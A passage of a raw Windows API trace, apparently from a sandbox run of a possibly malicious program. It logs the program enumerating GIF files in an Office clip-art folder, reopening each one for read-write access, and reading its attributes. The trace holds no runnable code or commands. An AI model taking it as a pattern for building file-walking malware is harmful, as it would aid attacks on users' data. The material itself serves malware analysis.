hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.674] AreFileApisANSI () returned 1 [0100.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0100.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.674] AreFileApisANSI () returned 1 [0100.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0100.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 69 [0100.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.675] GetFileType (hFile=0x33c) returned 0x1 [0100.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0100.675] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.675] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.675] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.675] CloseHandle (hObject=0x33c) returned 1 [0100.676] AreFileApisANSI () returned 1 [0100.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0100.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 69 [0100.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.676] GetFileType (hFile=0x33c) returned 0x1 [0100.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0100.676] CloseHandle (hObject=0x33c) returned 1 [0100.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0100.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0100.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0100.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0100.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0100.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.677] AreFileApisANSI () returned 1 [0100.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0100.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 69 [0100.677] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x296f)) returned 1 [0100.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0100.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.678] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3bcc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00142_.GIF", cAlternateFileName="")) returned 1 [0100.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0100.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0100.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0100.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.679] AreFileApisANSI () returned 1 [0100.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0100.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.679] AreFileApisANSI () returned 1 [0100.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0100.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 69 [0100.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.680] GetFileType (hFile=0x33c) returned 0x1 [0100.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0100.680] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.680] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.680] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.680] CloseHandle (hObject=0x33c) returned 1 [0100.681] AreFileApisANSI () returned 1 [0100.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0100.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 69 [0100.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.681] GetFileType (hFile=0x33c) returned 0x1 [0100.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0100.681] CloseHandle (hObject=0x33c) returned 1 [0100.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0100.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0100.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0100.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.682] AreFileApisANSI () returned 1 [0100.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0100.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 69 [0100.682] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3bcc)) returned 1 [0100.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0100.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.683] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14c3, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00154_.GIF", cAlternateFileName="")) returned 1 [0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 